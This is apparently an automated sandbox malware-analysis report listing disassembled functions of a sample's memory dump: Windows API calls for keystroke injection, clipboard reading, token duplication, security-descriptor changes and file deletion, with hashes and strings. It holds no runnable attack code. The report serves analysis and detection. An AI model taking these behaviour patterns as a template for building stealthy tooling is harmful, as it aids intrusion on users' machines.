Part of subcall function 00D530F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D5314E

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 4e1c544212de80beede1c4f106c3005fb99c335864aa0e06686f3de4aee52ff2
Instruction ID: 49f7eb3e616986a5cb6bcf2df075427b4245747b2adb26cba59610c7da6ba3d4
Opcode Fuzzy Hash: 4e1c544212de80beede1c4f106c3005fb99c335864aa0e06686f3de4aee52ff2
Instruction Fuzzy Hash: 4FE0262230034406CE08BB34A8524BDBB59CBE1393F40143EFC56832A3CE204A4E8231

Function 00D9039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00D90704,?,?,00000000,?,00D90704,00000000,0000000C), ref: 00D903B7

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26122b664a7e1301ecfd0b1f815a34204bbf59df4bb136a4a4da3a14e7d56e1c
Instruction ID: a326c52ad3ced0588518ae536cb9f675c26f39591cc826e2e82d15604e9b9f23
Opcode Fuzzy Hash: 26122b664a7e1301ecfd0b1f815a34204bbf59df4bb136a4a4da3a14e7d56e1c
Instruction Fuzzy Hash: 3FD06C3205024DBBDF029F84DD46EDA3FAAFB48714F014000BE1896120C732E822AB91

Function 00D51CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00D51CBC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 6ef533a1df696cdfeb7576bbe35382d556af314627c2f217335c4da32605a63c
Instruction ID: 442eaedb3cd5e6c96b29dfe15a39ab6a766f8e4019b180536a8ba57aa27211c6
Opcode Fuzzy Hash: 6ef533a1df696cdfeb7576bbe35382d556af314627c2f217335c4da32605a63c
Instruction Fuzzy Hash: 91C09B352C0344BFF2249781BC4AF107755B35CB00F048001F709B95E3C3A11415D651

Non-executed Functions

Function 00DE9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DE961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DE965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00DE969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DE96C9
SendMessageW.USER32 ref: 00DE96F2
GetKeyState.USER32(00000011), ref: 00DE978B
GetKeyState.USER32(00000009), ref: 00DE9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DE97AE
GetKeyState.USER32(00000010), ref: 00DE97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DE97E9
SendMessageW.USER32 ref: 00DE9810
SendMessageW.USER32(?,00001030,?,00DE7E95), ref: 00DE9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DE992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DE9941
SetCapture.USER32(?), ref: 00DE994A
ClientToScreen.USER32(?,?), ref: 00DE99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DE99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DE99D6
ReleaseCapture.USER32 ref: 00DE99E1
GetCursorPos.USER32(?), ref: 00DE9A19
ScreenToClient.USER32(?,?), ref: 00DE9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00DE9A80
SendMessageW.USER32 ref: 00DE9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00DE9AEB
SendMessageW.USER32 ref: 00DE9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DE9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DE9B4A
GetCursorPos.USER32(?), ref: 00DE9B68
ScreenToClient.USER32(?,?), ref: 00DE9B75
GetParent.USER32(?), ref: 00DE9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00DE9BFA
SendMessageW.USER32 ref: 00DE9C2B
ClientToScreen.USER32(?,?), ref: 00DE9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DE9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00DE9CDE
SendMessageW.USER32 ref: 00DE9D01
ClientToScreen.USER32(?,?), ref: 00DE9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DE9D82

Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952

GetWindowLongW.USER32(?,000000F0), ref: 00DE9E05

Strings

p#, xrefs: 00DE9990
F, xrefs: 00DE9D07
@GUI_DRAGID, xrefs: 00DE997D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#
API String ID: 3429851547-638943876
Opcode ID: 7bdb9f183a942e9efe0f771d41c286b1ce6d785e2194a878b54afbe6eb663dbb
Instruction ID: 87716714d54da776a3b0327df85736831e24a283df19e0a0c01b32bad6e3b33a
Opcode Fuzzy Hash: 7bdb9f183a942e9efe0f771d41c286b1ce6d785e2194a878b54afbe6eb663dbb
Instruction Fuzzy Hash: A5429D30205380AFDB24EF26CC94AAABBF5FF89310F14061EF999972A1D731D955CB61

Function 00D6F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D6F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DAF474
IsIconic.USER32(00000000), ref: 00DAF47D
ShowWindow.USER32(00000000,00000009), ref: 00DAF48A
SetForegroundWindow.USER32(00000000), ref: 00DAF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DAF4AA
GetCurrentThreadId.KERNEL32 ref: 00DAF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DAF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 00DAF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00DAF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00DAF4DE
SetForegroundWindow.USER32(00000000), ref: 00DAF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF4F6
keybd_event.USER32(00000012,00000000), ref: 00DAF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF50B
keybd_event.USER32(00000012,00000000), ref: 00DAF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF519
keybd_event.USER32(00000012,00000000), ref: 00DAF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF528
keybd_event.USER32(00000012,00000000), ref: 00DAF52D
SetForegroundWindow.USER32(00000000), ref: 00DAF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00DAF557

Strings

Shell_TrayWnd, xrefs: 00DAF46F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 6649f9a0adac1d50b25b837961453af95bda537a28beb8026e8b91b761a96588
Instruction ID: b29e925e2dd0e05db389fca4a4dc76015d82ce7ba318cafd1244e038f513e95e
Opcode Fuzzy Hash: 6649f9a0adac1d50b25b837961453af95bda537a28beb8026e8b91b761a96588
Instruction Fuzzy Hash: 26315271A503587FEB206BF59C89FBF7E6DEB45B50F141065FA00EA2D1C6B09D01AA70

Function 00DB1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00DB16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
Part of subcall function 00DB16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
Part of subcall function 00DB16C3: GetLastError.KERNEL32 ref: 00DB174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DB1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DB12A8
CloseHandle.KERNEL32(?), ref: 00DB12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DB12D1
GetProcessWindowStation.USER32 ref: 00DB12EA
SetProcessWindowStation.USER32(00000000), ref: 00DB12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DB1310

Part of subcall function 00DB10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DB11FC), ref: 00DB10D4
Part of subcall function 00DB10BF: CloseHandle.KERNEL32(?,?,00DB11FC), ref: 00DB10E9

Strings

, xrefs: 00DB125A
default, xrefs: 00DB130B
Z, xrefs: 00DB1392
winsta0, xrefs: 00DB12CC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z
API String ID: 22674027-1808616255
Opcode ID: f7d794786d7121cd20647aa6c06a48cd80d2b3fa2a560127e3e8fb44f4148bf2
Instruction ID: 7910502f362bb2076011e0700e9cc54e2d1c6bcfd83ec0a22764dcfbe4bb315a
Opcode Fuzzy Hash: f7d794786d7121cd20647aa6c06a48cd80d2b3fa2a560127e3e8fb44f4148bf2
Instruction Fuzzy Hash: AC818A75900349EBDF21AFA4DC99BEE7BB9EF04704F584129F912E62A0DB318945CB30

Function 00DB0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
Part of subcall function 00DB10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
Part of subcall function 00DB10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
Part of subcall function 00DB10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DB0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DB0C00
GetLengthSid.ADVAPI32(?), ref: 00DB0C17
GetAce.ADVAPI32(?,00000000,?), ref: 00DB0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DB0C6D
GetLengthSid.ADVAPI32(?), ref: 00DB0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DB0C8C
HeapAlloc.KERNEL32(00000000), ref: 00DB0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DB0CB4
CopySid.ADVAPI32(00000000), ref: 00DB0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DB0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DB0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DB0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D45
HeapFree.KERNEL32(00000000), ref: 00DB0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D55
HeapFree.KERNEL32(00000000), ref: 00DB0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D65
HeapFree.KERNEL32(00000000), ref: 00DB0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00DB0D78
HeapFree.KERNEL32(00000000), ref: 00DB0D7F

Part of subcall function 00DB1193: GetProcessHeap.KERNEL32(00000008,00DB0BB1,?,00000000,?,00DB0BB1,?), ref: 00DB11A1
Part of subcall function 00DB1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DB0BB1,?), ref: 00DB11A8
Part of subcall function 00DB1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DB0BB1,?), ref: 00DB11B7

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 80733c3f0351d119d8cbbae04d8e0355f9ce89a4334d49665002bfabe0130980
Instruction ID: 9097773308686c153adb9437edf0eab650e2c8b855f96e666c29f160a8248471
Opcode Fuzzy Hash: 80733c3f0351d119d8cbbae04d8e0355f9ce89a4334d49665002bfabe0130980
Instruction Fuzzy Hash: E1713A7590024AEBDF10AFA4DC84FEFBBB8BF05310F184515E916EA291D771AA06CB70

Function 00DCEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00DECC08), ref: 00DCEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 00DCEB37
GetClipboardData.USER32(0000000D), ref: 00DCEB43
CloseClipboard.USER32 ref: 00DCEB4F
GlobalLock.KERNEL32(00000000), ref: 00DCEB87
CloseClipboard.USER32 ref: 00DCEB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00DCEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 00DCEBC9
GetClipboardData.USER32(00000001), ref: 00DCEBD1
GlobalLock.KERNEL32(00000000), ref: 00DCEBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 00DCEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 00DCEC38
GetClipboardData.USER32(0000000F), ref: 00DCEC44
GlobalLock.KERNEL32(00000000), ref: 00DCEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DCEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DCEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DCECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 00DCECF3
CountClipboardFormats.USER32 ref: 00DCED14
CloseClipboard.USER32 ref: 00DCED59

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 8eb00be46c339b237b86bbddc7699831de81412baa8ca0cd9beb7bac2fef8596
Instruction ID: 05f4a2d27250fec53ff6e7a8a878f38ae208d916b8489e766dc5dcc4c430f503
Opcode Fuzzy Hash: 8eb00be46c339b237b86bbddc7699831de81412baa8ca0cd9beb7bac2fef8596
Instruction Fuzzy Hash: F96189B42043429FD700EF24C895F6ABBA4AB84714F18551DF8569B2A2DB71D90ACBB2

Function 00DC698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00DC69BE
FindClose.KERNEL32(00000000), ref: 00DC6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DC6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DC6A75

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00DC6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DC6ADF

Strings

%03d, xrefs: 00DC6DA2
%4d, xrefs: 00DC6BB1
%4d%02d%02d%02d%02d%02d, xrefs: 00DC6B6A
%02d, xrefs: 00DC6C00, 00DC6C0A, 00DC6C5A, 00DC6CAA, 00DC6CFA, 00DC6D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00DC6B32

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: b282003fb7df677f2129fa76752c744bc760c716016da8cd0c342602bdbb8172
Instruction ID: 0747742680077c0f02b0f2bae3e592fabf8f66596e5ce186fff369d8c1e45300
Opcode Fuzzy Hash: b282003fb7df677f2129fa76752c744bc760c716016da8cd0c342602bdbb8172
Instruction Fuzzy Hash: 92D14DB1508300AEC710EBA4D891EABB7ECEF98705F44491DF985D7191EB34DA48CB72

Function 00DC9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00DC9663
GetFileAttributesW.KERNEL32(?), ref: 00DC96A1
SetFileAttributesW.KERNEL32(?,?), ref: 00DC96BB
FindNextFileW.KERNEL32(00000000,?), ref: 00DC96D3
FindClose.KERNEL32(00000000), ref: 00DC96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 00DC96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 00DC974A
SetCurrentDirectoryW.KERNEL32(00E16B7C), ref: 00DC9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC9772
FindClose.KERNEL32(00000000), ref: 00DC977F
FindClose.KERNEL32(00000000), ref: 00DC978F

Strings

*.*, xrefs: 00DC96F5

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 28a9026f704857826d730abd3177e0d1076cffaf104fc1efb58018622531facb
Instruction ID: 0939afaef0f84a16d6cf1f21f814639c22c42a713a34f66fe0592cfefd14101d
Opcode Fuzzy Hash: 28a9026f704857826d730abd3177e0d1076cffaf104fc1efb58018622531facb
Instruction Fuzzy Hash: 9131CD3254134A6ACB10AFB4EC5DFDEB7ACAF09320F144159E914E71E0EB70DA858A38

Function 00DC979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00DC97BE
FindNextFileW.KERNEL32(00000000,?), ref: 00DC9819
FindClose.KERNEL32(00000000), ref: 00DC9824
FindFirstFileW.KERNEL32(*.*,?), ref: 00DC9840
SetCurrentDirectoryW.KERNEL32(?), ref: 00DC9890
SetCurrentDirectoryW.KERNEL32(00E16B7C), ref: 00DC98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC98B8
FindClose.KERNEL32(00000000), ref: 00DC98C5
FindClose.KERNEL32(00000000), ref: 00DC98D5

Part of subcall function 00DBDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DBDB00

Strings

*.*, xrefs: 00DC983B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 233f8653ac4bc7546d6be1c9f2bf654fbae527d93dc503254d20319c8bbfbecc
Instruction ID: 55e4d0a7ae2fc967366845874927f1af1e788a5cb9ef5df85e208ddf0e831854
Opcode Fuzzy Hash: 233f8653ac4bc7546d6be1c9f2bf654fbae527d93dc503254d20319c8bbfbecc
Instruction Fuzzy Hash: AF31C03250035A6ADF10AFA4EC59FDEB7ACAF06320F14415AE914E71D0DB71DA868A74

Function 00DBD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2

Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A

FindFirstFileW.KERNEL32(?,?), ref: 00DBD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DBD1DD
MoveFileW.KERNEL32(?,?), ref: 00DBD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 00DBD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBD237

Part of subcall function 00DBD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DBD21C,?,?), ref: 00DBD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 00DBD253
FindClose.KERNEL32(00000000), ref: 00DBD264

Strings

\*.*, xrefs: 00DBD0CD, 00DBD0D6, 00DBD0EB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 520d06937d11228331da84d21c533ab69ac2dfa404dc7ab3c68341d1b435d543
